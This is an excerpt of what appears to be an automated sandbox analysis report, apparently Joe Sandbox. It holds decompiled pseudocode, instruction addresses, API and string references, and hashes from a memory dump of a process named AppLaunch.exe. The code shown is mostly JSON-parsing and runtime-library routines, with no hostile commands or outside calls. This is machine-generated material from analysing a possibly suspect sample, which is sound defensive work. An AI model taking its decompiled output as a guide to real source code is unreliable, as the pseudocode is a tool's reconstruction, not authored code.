															__eax = E00420100( *(__ebp - 0x2a8) + 0x30);
															_push(__edx);
															__ecx =  *(__ebp + 8);
															__eax = E004217C0( *(__ebp + 8), __eax);
															__ecx = __al & 0x000000ff;
															__eflags = __ecx;
															if(__ecx != 0) {
																L46:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L45:
																 *((char*)(__ebp - 0x2cb)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2cb));
															}
															goto L79;
														case 6:
															L38:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E004200E0( *(__ebp - 0x2a8) + 0x30);
															_push(__edx);
															__ecx =  *(__ebp + 8);
															__eax = E00421770(__ecx, __eax);
															__edx = __al & 0x000000ff;
															__eflags = __edx;
															if(__edx != 0) {
																L40:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L39:
																 *((char*)(__ebp - 0x2c9)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c9));
															}
															goto L79;
														case 7:
															goto L0;
														case 8:
															L18:
															__ecx =  *(__ebp + 8);
															__eax = E00424150(__ebx,  *(__ebp + 8), __edi, __esi, 0xffffffff);
															__ecx = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L20:
																__ecx =  *(__ebp - 0x2a8);
																__eflags = E00420190( *(__ebp - 0x2a8)) - 0xa;
																if(__eflags != 0) {
																	L24:
																	 *(__ebp - 0x2c3) = 1;
																	__eax = __ebp - 0x2c3;
																	__ecx = __ebp - 0x2bc;
																	__eax = E00422090(__ecx, __ebp - 0x2c3);
																	goto L1;
																} else {
																	L21:
																	__ecx =  *(__ebp + 8);
																	__eax = E0041F160(__ecx, __eflags);
																	__edx = __al & 0x000000ff;
																	__eflags = __edx;
																	if(__edx != 0) {
																		L23:
																		while(1) {
																			L49:
																			goto L51;
																		}
																	} else {
																		L22:
																		 *((char*)(__ebp - 0x2c2)) = 0;
																		__ecx = __ebp - 0x2bc;
																		__eax = E00416CE0(__ecx);
																		__al =  *((intOrPtr*)(__ebp - 0x2c2));
																	}
																}
															} else {
																L19:
																 *((char*)(__ebp - 0x2d6)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2d6));
															}
															goto L79;
														case 9:
															L5:
															_t521 = E00424260(_t656,  *((intOrPtr*)(_t889 + 8)), _t887, _t888, 0xffffffff);
															_t850 = _t521 & 0x000000ff;
															if((_t521 & 0x000000ff) != 0) {
																L7:
																__eflags = E00420190( *(_t889 - 0x2a8)) - 0xb;
																if(__eflags != 0) {
																	L11:
																	__eflags =  *( *(_t889 - 0x2a8) + 0x28) - 4;
																	if(__eflags == 0) {
																		L13:
																		_t524 = E00420E20( *((intOrPtr*)(_t889 + 8)), E00420170( *(_t889 - 0x2a8) + 0x30));
																		_t850 = _t524 & 0x000000ff;
																		__eflags = _t524 & 0x000000ff;
																		if((_t524 & 0x000000ff) != 0) {
																			L15:
																			__eflags = E00420190( *(_t889 - 0x2a8)) - 0xc;
																			if(__eflags == 0) {
																				L17:
																				 *((char*)(_t889 - 0x2c1)) = 0;
																				E00422090(_t889 - 0x2bc, _t889 - 0x2c1);
																				E00420190( *(_t889 - 0x2a8));
																				goto L1;
																			} else {
																				L16:
																				 *((intOrPtr*)(_t889 - 0x3d4)) = E00414FA0(_t889 - 0x434, 0);
																				E00415310(_t889 - 0x4c, __eflags, "object separator");
																				 *((intOrPtr*)(_t889 - 0x3d8)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x154, 0xc, _t889 - 0x4c);
																				 *((intOrPtr*)(_t889 - 0x3d0)) =  *(_t889 - 0x2a8) + 0x30;
																				 *((intOrPtr*)(_t889 - 0x3dc)) = E00420140( *((intOrPtr*)(_t889 - 0x3d0)), _t889 - 0x534);
																				 *((intOrPtr*)(_t889 - 0x3e8)) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x5e4, 0x65,  *((intOrPtr*)(_t889 - 0x3dc)),  *((intOrPtr*)(_t889 - 0x3d8)),  *((intOrPtr*)(_t889 - 0x3d4)));
																				 *((intOrPtr*)(_t889 - 0x3e0)) =  *(_t889 - 0x2a8) + 0x30;
																				 *((intOrPtr*)(_t889 - 0x3ec)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x3e0)), _t887, _t888, _t889 - 0x13c);
																				 *((intOrPtr*)(_t889 - 0x3e4)) =  *(_t889 - 0x2a8) + 0x30;
																				 *(_t889 - 0x3f0) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x3e4)), _t889 - 0x540));
																				_t850 =  *(_t889 - 0x3f0);
																				 *((char*)(_t889 - 0x2c0)) = E00412130( *((intOrPtr*)(_t889 + 8)),  *(_t889 - 0x3f0),  *((intOrPtr*)(_t889 - 0x3ec)),  *((intOrPtr*)(_t889 - 0x3e8)));
																				E00416980(_t889 - 0x13c);
																				E00416D90(_t889 - 0x5e4);
																				E00416980(_t889 - 0x154);
																				E00416980(_t889 - 0x4c);
																				E00416950(_t889 - 0x434);
																				E00416CE0(_t889 - 0x2bc);
																				_t492 =  *((intOrPtr*)(_t889 - 0x2c0));
																			}
																		} else {
																			L14:
																			 *((char*)(_t889 - 0x2bf)) = 0;
																			E00416CE0(_t889 - 0x2bc);
																			_t492 =  *((intOrPtr*)(_t889 - 0x2bf));
																		}
																	} else {
																		L12:
																		 *((intOrPtr*)(_t889 - 0x3b0)) = E00414FA0(_t889 - 0x444, 0);
																		E00415310(_t889 - 0x34, __eflags, "object key");
																		 *((intOrPtr*)(_t889 - 0x3b4)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x124, 4, _t889 - 0x34);
																		 *((intOrPtr*)(_t889 - 0x3ac)) =  *(_t889 - 0x2a8) + 0x30;
																		 *((intOrPtr*)(_t889 - 0x3b8)) = E00420140( *((intOrPtr*)(_t889 - 0x3ac)), _t889 - 0x51c);
																		 *(_t889 - 0x3c4) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x5c4, 0x65,  *((intOrPtr*)(_t889 - 0x3b8)),  *((intOrPtr*)(_t889 - 0x3b4)),  *((intOrPtr*)(_t889 - 0x3b0)));
																		 *((intOrPtr*)(_t889 - 0x3bc)) =  *(_t889 - 0x2a8) + 0x30;
																		 *((intOrPtr*)(_t889 - 0x3c8)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x3bc)), _t887, _t888, _t889 - 0x10c);
																		 *((intOrPtr*)(_t889 - 0x3c0)) =  *(_t889 - 0x2a8) + 0x30;
																		 *((intOrPtr*)(_t889 - 0x3cc)) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x3c0)), _t889 - 0x528));
																		_t850 =  *(_t889 - 0x3c4);
																		 *((char*)(_t889 - 0x2be)) = E00412130( *((intOrPtr*)(_t889 + 8)),  *((intOrPtr*)(_t889 - 0x3cc)),  *((intOrPtr*)(_t889 - 0x3c8)),  *(_t889 - 0x3c4));
																		E00416980(_t889 - 0x10c);
																		E00416D90(_t889 - 0x5c4);
																		E00416980(_t889 - 0x124);
																		E00416980(_t889 - 0x34);
																		E00416950(_t889 - 0x444);
																		E00416CE0(_t889 - 0x2bc);
																		_t492 =  *((intOrPtr*)(_t889 - 0x2be));
																	}
																} else {
																	L8:
																	_t571 = E0041F160( *((intOrPtr*)(_t889 + 8)), __eflags);
																	__eflags = _t571 & 0x000000ff;
																	if((_t571 & 0x000000ff) != 0) {
																		L10:
																		while(1) {
																			L49:
																			goto L51;
																		}
																	} else {
																		L9:
																		 *((char*)(_t889 - 0x2bd)) = 0;
																		E00416CE0(_t889 - 0x2bc);
																		_t492 =  *((intOrPtr*)(_t889 - 0x2bd));
																	}
																}
															} else {
																L6:
																 *((char*)(_t889 - 0x2d7)) = 0;
																E00416CE0(_t889 - 0x2bc);
																_t492 =  *((intOrPtr*)(_t889 - 0x2d7));
															}
															goto L79;
														case 0xa:
															L47:
															__ecx = __ebp - 0x46c;
															 *(__ebp - 0x418) = E00414FA0(__ebp - 0x46c, 0);
															__ecx = __ebp - 0x64;
															__eax = E00415310(__ebp - 0x64, __eflags, "value");
															__edx = __ebp - 0x64;
															__eax = __ebp - 0x1cc;
															__ecx =  *(__ebp - 0x2a8);
															 *(__ebp - 0x41c) = E0041F5F0(__ebx,  *(__ebp - 0x2a8), __edi, __esi, __eflags, __ebp - 0x1cc, 0, __ebp - 0x64);
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x414) =  *(__ebp - 0x2a8) + 0x30;
															__edx = __ebp - 0x558;
															__ecx =  *(__ebp - 0x414);
															 *(__ebp - 0x2e0) = E00420140( *(__ebp - 0x414), __ebp - 0x558);
															__eax =  *(__ebp - 0x418);
															__ecx =  *(__ebp - 0x41c);
															__edx =  *(__ebp - 0x2e0);
															__eax = __ebp - 0x604;
															 *(__ebp - 0x2ec) = E0040C460(__ebx, __edi, __esi, __eflags, __ebp - 0x604, 0x65,  *(__ebp - 0x2e0),  *(__ebp - 0x41c),  *(__ebp - 0x418));
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x2e4) =  *(__ebp - 0x2a8) + 0x30;
															__edx = __ebp - 0x1b4;
															__ecx =  *(__ebp - 0x2e4);
															 *(__ebp - 0x2f0) = E004201C0(__ebx,  *(__ebp - 0x2e4), __edi, __esi, __ebp - 0x1b4);
															 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
															 *(__ebp - 0x2e8) =  *(__ebp - 0x2a8) + 0x30;
															__ecx = __ebp - 0x564;
															__ecx =  *(__ebp - 0x2e8);
															__ecx = E00420140( *(__ebp - 0x2e8), __ebp - 0x564);
															 *(__ebp - 0x2f4) = __eax;
															__edx =  *(__ebp - 0x2ec);
															__eax =  *(__ebp - 0x2f0);
															__ecx =  *(__ebp - 0x2f4);
															__ecx =  *(__ebp + 8);
															__eax = E00412130( *(__ebp + 8),  *(__ebp - 0x2f4),  *(__ebp - 0x2f0),  *(__ebp - 0x2ec));
															 *(__ebp - 0x2cc) = __al;
															__ecx = __ebp - 0x1b4;
															__eax = E00416980(__ebp - 0x1b4);
															__ecx = __ebp - 0x604;
															__eax = E00416D90(__ebp - 0x604);
															__ecx = __ebp - 0x1cc;
															__eax = E00416980(__ebp - 0x1cc);
															__ecx = __ebp - 0x64;
															__eax = E00416980(__ebp - 0x64);
															__ecx = __ebp - 0x46c;
															__eax = E00416950(__ebp - 0x46c);
															__ecx = __ebp - 0x2bc;
															__eax = E00416CE0(__ecx);
															__al =  *(__ebp - 0x2cc);
															goto L79;
													}
												}
											}
											goto L79;
										}
										_t492 = E00416CE0(_t889 - 0x2bc);
									}
								}
								goto L79;
							}
							L52:
							 *((char*)(_t889 - 0x2ce)) = 1;
							E00416CE0(_t889 - 0x2bc);
							_t492 =  *((intOrPtr*)(_t889 - 0x2ce));
							goto L79;
						}
					} else {
						L27:
						 *((char*)(_t889 - 0x2c5)) = 0;
						E00416CE0(_t889 - 0x2bc);
						_t492 =  *((intOrPtr*)(_t889 - 0x2c5));
					}
					L79:
					return E00424900(_t492, _t656,  *(_t889 - 4) ^ _t889, _t850, _t887, _t888);
					L80:
				}
				L25:
				__ecx = __ebp - 0x45c;
				 *(__ebp - 0x3f8) = E00414FA0(__ebp - 0x45c, 0);
				 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
				 *(__ebp - 0x3f4) =  *(__ebp - 0x2a8) + 0x30;
				__eax = __ebp - 0x19c;
				__ecx =  *(__ebp - 0x3f4);
				__eax = E004201C0(__ebx,  *(__ebp - 0x3f4), __edi, __esi, __ebp - 0x19c);
				__ecx = __ebp - 0xf4;
				__eax = E00406320(__eflags, __ebp - 0xf4, "number overflow parsing \'", __eax);
				__edx = __ebp - 0x184;
				 *(__ebp - 0x3fc) = __eax;
				__eax =  *(__ebp - 0x3f8);
				__ecx =  *(__ebp - 0x3fc);
				__edx = __ebp - 0x5a4;
				 *(__ebp - 0x408) = E0040C390(__ebx, __edi, __esi, __eflags, __ebp - 0x5a4, 0x196,  *(__ebp - 0x3fc),  *(__ebp - 0x3f8));
				 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
				 *(__ebp - 0x400) =  *(__ebp - 0x2a8) + 0x30;
				__ecx = __ebp - 0x16c;
				__ecx =  *(__ebp - 0x400);
				 *(__ebp - 0x40c) = E004201C0(__ebx,  *(__ebp - 0x400), __edi, __esi, __ebp - 0x16c);
				 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
				 *(__ebp - 0x404) =  *(__ebp - 0x2a8) + 0x30;
				__eax = __ebp - 0x54c;
				__ecx =  *(__ebp - 0x404);
				__ecx = E00420140( *(__ebp - 0x404), __ebp - 0x54c);
				 *(__ebp - 0x410) = __eax;
				__ecx =  *(__ebp - 0x408);
				__edx =  *(__ebp - 0x40c);
				__eax =  *(__ebp - 0x410);
				__ecx =  *(__ebp + 8);
				__eax = E00412130( *(__ebp + 8),  *(__ebp - 0x410),  *(__ebp - 0x40c),  *(__ebp - 0x408));
				 *(__ebp - 0x2c4) = __al;
				__ecx = __ebp - 0x16c;
				__eax = E00416980(__ebp - 0x16c);
				__ecx = __ebp - 0x5a4;
				__eax = E00416D90(__ebp - 0x5a4);
				__ecx = __ebp - 0x184;
				__eax = E00416980(__ebp - 0x184);
				__ecx = __ebp - 0xf4;
				__eax = E00416980(__ebp - 0xf4);
				__ecx = __ebp - 0x19c;
				__eax = E00416980(__ebp - 0x19c);
				__ecx = __ebp - 0x45c;
				__eax = E00416950(__ebp - 0x45c);
				__ecx = __ebp - 0x2bc;
				__eax = E00416CE0(__ecx);
				__al =  *(__ebp - 0x2c4);
				goto L79;
			}

0x004138ca
0x004138ca
0x004138ca
0x004138ca
0x004138ca
0x004138ca
0x004138ca
0x004138d3
0x004138d8
0x004138e1
0x004138e9
0x004138ee
0x004138f3
0x004138fb
0x00000000
0x00000000
0x00413a5d
0x00413a66
0x00413a6c
0x00413a6f
0x00413a77
0x00413a7f
0x00413a87
0x00413a89
0x00413aa8
0x00413eac
0x00413eac
0x00413eb5
0x00413eb5
0x00413ebb
0x00413ec0
0x00413ec3
0x00413ec5
0x00000000
0x00000000
0x00413ee4
0x00413ef8
0x00413f00
0x00413f02
0x004140f3
0x004140f9
0x004140fe
0x00414101
0x00414432
0x00414438
0x0041443c
0x004144aa
0x004144b7
0x004144c8
0x004144e8
0x004144f7
0x0041450f
0x0041453b
0x0041454a
0x00414562
0x00414571
0x00414590
0x00414596
0x004145b3
0x004145bf
0x004145ca
0x004145d5
0x004145e0
0x004145eb
0x004145f6
0x004145fb
0x0041443e
0x0041443e
0x00414441
0x00414446
0x00414449
0x0041444b
0x0041446a
0x00414478
0x0041447a
0x0041447c
0x0041448b
0x00414490
0x00414490
0x00414499
0x0041449e
0x00000000
0x0041444d
0x0041444d
0x0041444d
0x0041445a
0x0041445f
0x0041445f
0x0041444b
0x00414107
0x00414107
0x00414112
0x00414115
0x00414277
0x00414289
0x00414291
0x00414293
0x004142b2
0x004142bd
0x004142c0
0x00414422
0x00414428
0x00000000
0x004142c6
0x004142c6
0x004142d3
0x004142e4
0x00414304
0x00414313
0x0041432b
0x00414357
0x00414366
0x0041437e
0x0041438d
0x004143ac
0x004143b9
0x004143cf
0x004143db
0x004143e6
0x004143f1
0x004143fc
0x00414407
0x00414412
0x00414417
0x00414417
0x00414295
0x00414295
0x00414295
0x004142a2
0x004142a7
0x004142a7
0x0041411b
0x0041411b
0x00414128
0x00414139
0x00414159
0x00414168
0x00414180
0x004141ac
0x004141bb
0x004141d3
0x004141e2
0x00414201
0x00414215
0x00414224
0x00414230
0x0041423b
0x00414246
0x00414251
0x0041425c
0x00414267
0x0041426c
0x0041426c
0x00414115
0x00413f08
0x00413f08
0x00413f0e
0x00413f13
0x00413f16
0x00413f28
0x00413f28
0x00413f2e
0x00413f32
0x00413fa0
0x00413fad
0x00413fbb
0x00413fd8
0x00413fe7
0x00413fff
0x0041402b
0x0041403a
0x00414052
0x00414061
0x00414080
0x00414094
0x004140a3
0x004140af
0x004140ba
0x004140c5
0x004140cd
0x004140d8
0x004140e3
0x004140e8
0x00413f34
0x00413f34
0x00413f37
0x00413f3f
0x00413f41
0x00413f60
0x00413f6e
0x00413f70
0x00413f72
0x00413f81
0x00413f86
0x00413f86
0x00413f8f
0x00413f94
0x00000000
0x00413f43
0x00413f43
0x00413f43
0x00413f50
0x00413f55
0x00413f55
0x00413f41
0x00413f18
0x00413f18
0x00413f1e
0x00000000
0x0041345b
0x00413471
0x00413eae
0x00413eae
0x00000000
0x00413477
0x00413477
0x00413480
0x0041348d
0x00413d59
0x00413d66
0x00413d74
0x00413d91
0x00413da0
0x00413db8
0x00413de4
0x00413df3
0x00413e0b
0x00413e1a
0x00413e39
0x00413e3f
0x00413e5c
0x00413e68
0x00413e73
0x00413e7e
0x00413e86
0x00413e91
0x00413e9c
0x00413ea1
0x00413493
0x00413493
0x00413499
0x00000000
0x00000000
0x00000000
0x00413b11
0x00413b13
0x00413b16
0x00413b1b
0x00413b1e
0x00413b20
0x00413b3f
0x00413eac
0x00000000
0x00413b22
0x00413b22
0x00413b22
0x00413b29
0x00413b2f
0x00413b34
0x00413b34
0x00000000
0x00000000
0x00413aad
0x00413aaf
0x00413ab2
0x00413ab7
0x00413aba
0x00413abc
0x00413adb
0x00413eac
0x00413eac
0x00000000
0x00413eac
0x00413abe
0x00413abe
0x00413abe
0x00413ac5
0x00413acb
0x00413ad0
0x00413ad0
0x00000000
0x00000000
0x00413ae0
0x00413ae0
0x00413ae8
0x00413aeb
0x00413aed
0x00413b0c
0x00413eac
0x00413eac
0x00000000
0x00413eac
0x00413aef
0x00413aef
0x00413aef
0x00413af6
0x00413afc
0x00413b01
0x00413b01
0x00000000
0x00000000
0x00413b85
0x00413b85
0x00413b8b
0x00413b8e
0x00413b94
0x00413b9c
0x00413b9f
0x00413ba1
0x00413bc0
0x00413eac
0x00413eac
0x00000000
0x00413eac
0x00413ba3
0x00413ba3
0x00413ba3
0x00413baa
0x00413bb0
0x00413bb5
0x00413bb5
0x00000000
0x00000000
0x00413bc5
0x00413bc5
0x00413bcb
0x00413bce
0x00413bd3
0x00413bd5
0x00413bd8
0x00413bdd
0x00413be0
0x00413be2
0x00413c01
0x00413eac
0x00413eac
0x00000000
0x00413eac
0x00413be4
0x00413be4
0x00413be4
0x00413beb
0x00413bf1
0x00413bf6
0x00413bf6
0x00000000
0x00000000
0x00413b44
0x00413b44
0x00413b4a
0x00413b4d
0x00413b52
0x00413b54
0x00413b57
0x00413b5c
0x00413b5f
0x00413b61
0x00413b80
0x00413eac
0x00413eac
0x00000000
0x00413eac
0x00413b63
0x00413b63
0x00413b63
0x00413b6a
0x00413b70
0x00413b75
0x00413b75
0x00000000
0x00000000
0x00000000
0x00000000
0x0041383d
0x0041383f
0x00413842
0x00413847
0x0041384a
0x0041384c
0x0041386b
0x0041386b
0x00413876
0x00413879
0x004138ac
0x004138ac
0x004138b3
0x004138ba
0x004138c0
0x00000000
0x0041387b
0x0041387b
0x0041387b
0x0041387e
0x00413883
0x00413886
0x00413888
0x004138a7
0x00413eac
0x00413eac
0x00000000
0x00413eac
0x0041388a
0x0041388a
0x0041388a
0x00413891
0x00413897
0x0041389c
0x0041389c
0x00413888
0x0041384e
0x0041384e
0x0041384e
0x00413855
0x0041385b
0x00413860
0x00413860
0x00000000
0x00000000
0x004134a0
0x004134a5
0x004134aa
0x004134af
0x004134ce
0x004134d9
0x004134dc
0x0041350f
0x00413515
0x00413519
0x00413672
0x00413684
0x00413689
0x0041368c
0x0041368e
0x004136ad
0x004136b8
0x004136bb
0x00413814
0x00413814
0x00413828
0x00413833
0x00000000
0x004136c1
0x004136c1
0x004136ce
0x004136dc
0x004136f9
0x00413708
0x00413720
0x0041374c
0x0041375b
0x00413773
0x00413782
0x004137a1
0x004137b5
0x004137c4
0x004137d0
0x004137db
0x004137e6
0x004137ee
0x004137f9
0x00413804
0x00413809
0x00413809
0x00413690
0x00413690
0x00413690
0x0041369d
0x004136a2
0x004136a2
0x0041351f
0x0041351f
0x0041352c
0x0041353a
0x00413557
0x00413566
0x0041357e
0x004135aa
0x004135b9
0x004135d1
0x004135e0
0x004135ff
0x00413605
0x00413622
0x0041362e
0x00413639
0x00413644
0x0041364c
0x00413657
0x00413662
0x00413667
0x00413667
0x004134de
0x004134de
0x004134e1
0x004134e9
0x004134eb
0x0041350a
0x00413eac
0x00413eac
0x00000000
0x00413eac
0x004134ed
0x004134ed
0x004134ed
0x004134fa
0x004134ff
0x004134ff
0x004134eb
0x004134b1
0x004134b1
0x004134b1
0x004134be
0x004134c3
0x004134c3
0x00000000
0x00000000
0x00413c06
0x00413c08
0x00413c13
0x00413c1e
0x00413c21
0x00413c26
0x00413c2c
0x00413c33
0x00413c3e
0x00413c4a
0x00413c4d
0x00413c53
0x00413c5a
0x00413c65
0x00413c6b
0x00413c72
0x00413c79
0x00413c82
0x00413c91
0x00413c9d
0x00413ca0
0x00413ca6
0x00413cad
0x00413cb8
0x00413cc4
0x00413cc7
0x00413ccd
0x00413cd4
0x00413cdf
0x00413ce6
0x00413cec
0x00413cf3
0x00413cfa
0x00413d01
0x00413d04
0x00413d09
0x00413d0f
0x00413d15
0x00413d1a
0x00413d20
0x00413d25
0x00413d2b
0x00413d30
0x00413d33
0x00413d38
0x00413d3e
0x00413d43
0x00413d49
0x00413d4e
0x00000000
0x00000000
0x00413499
0x0041348d
0x00000000
0x00413471
0x0041460e
0x0041460e
0x00413f16
0x00000000
0x00413f02
0x00413ec7
0x00413ec7
0x00413ed4
0x00413ed9
0x00000000
0x00413ed9
0x00413a8b
0x00413a8b
0x00413a8b
0x00413a98
0x00413a9d
0x00413a9d
0x00414613
0x00414620
0x00000000
0x00414620
0x00413901
0x00413903
0x0041390e
0x0041391a
0x0041391d
0x00413928
0x0041392f
0x00413935
0x00413940
0x00413947
0x00413950
0x0041395f
0x00413965
0x0041396c
0x00413978
0x00413987
0x00413993
0x00413996
0x0041399c
0x004139a3
0x004139ae
0x004139ba
0x004139bd
0x004139c3
0x004139ca
0x004139d5
0x004139dc
0x004139e2
0x004139e9
0x004139f0
0x004139f7
0x004139fa
0x004139ff
0x00413a05
0x00413a0b
0x00413a10
0x00413a16
0x00413a1b
0x00413a21
0x00413a26
0x00413a2c
0x00413a31
0x00413a37
0x00413a3c
0x00413a42
0x00413a47
0x00413a4d
0x00413a52
0x00000000

APIs

Part of subcall function 004201C0: task.LIBCPMTD ref: 0042028A

Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C408
Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C410
Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C418
Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C420
Part of subcall function 0040C390: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 0040C435
Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C43D

task.LIBCPMTD ref: 00413A0B
task.LIBCPMTD ref: 00413A21
task.LIBCPMTD ref: 00413A2C
task.LIBCPMTD ref: 00413A37

Strings

number overflow parsing ', xrefs: 0041393B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID: number overflow parsing '
API String ID: 2520070614-3802681121
Opcode ID: 424209a498a3660aa9a2254fc6b10d99d21df6833db471738ee903d9ae8f7b01
Instruction ID: d30f1e382d405c67e50468fbf5df40872062e388c7cc8cb528ab3fd19cce4bbf
Opcode Fuzzy Hash: 424209a498a3660aa9a2254fc6b10d99d21df6833db471738ee903d9ae8f7b01
Instruction Fuzzy Hash: 2E513DB09101299BCB28EB25DC51BEEB7B9AF45308F4041EEA24A66142DB345FC5CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00435D77 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435D77(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E00437047(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00437047(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E00429333(GetLastError());
									_t17 =  *((intOrPtr*)(E00429369(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00435E3E(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00429333(GetLastError());
						_t17 =  *((intOrPtr*)(E00429369(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00435E3E(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E00435E65(_a8);
				return 0;
			}

0x00435d7d
0x00435d82
0x00435d96
0x00435d99
0x00435dcb
0x00435dd3
0x00435dd5
0x00435dee
0x00435df1
0x00435df4
0x00435e02
0x00435e11
0x00435e19
0x00435e1b
0x00435e34
0x00435e37
0x00435e37
0x00435e1d
0x00435e24
0x00435e2f
0x00435e2f
0x00435e39
0x00435e3a
0x00000000
0x00435e3a
0x00435df9
0x00435dfe
0x00435e00
0x00000000
0x00000000
0x00000000
0x00435e00
0x00435dde
0x00435de9
0x00000000
0x00435de9
0x00435d9b
0x00435d9e
0x00435da1
0x00435db4
0x00435db7
0x00435db9
0x00435dbb
0x00000000
0x00435dbb
0x00435da7
0x00435dac
0x00435dae
0x00000000
0x00000000
0x00000000
0x00435dae
0x00435d87
0x00000000

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 00435D7C

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID:
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
API String ID: 0-448403072
Opcode ID: 7d770d495c68cd0a1ec168c960c866b0a7f2b0e44d53b6b96c69c1713c7c1fa1
Instruction ID: 8e7a25ff80c85deeb674b160d7dea09f7fc53724d3a4d3de8669de4ef4808e82
Opcode Fuzzy Hash: 7d770d495c68cd0a1ec168c960c866b0a7f2b0e44d53b6b96c69c1713c7c1fa1
Instruction Fuzzy Hash: 3721D771204905AFDB20AF62DC42D6F77ADEF18368F10952BF919D7241E738DD4087A8

Uniqueness

Uniqueness Score: -1.00%

Function 00432300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00432300(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x4c6260; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00432FF4(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
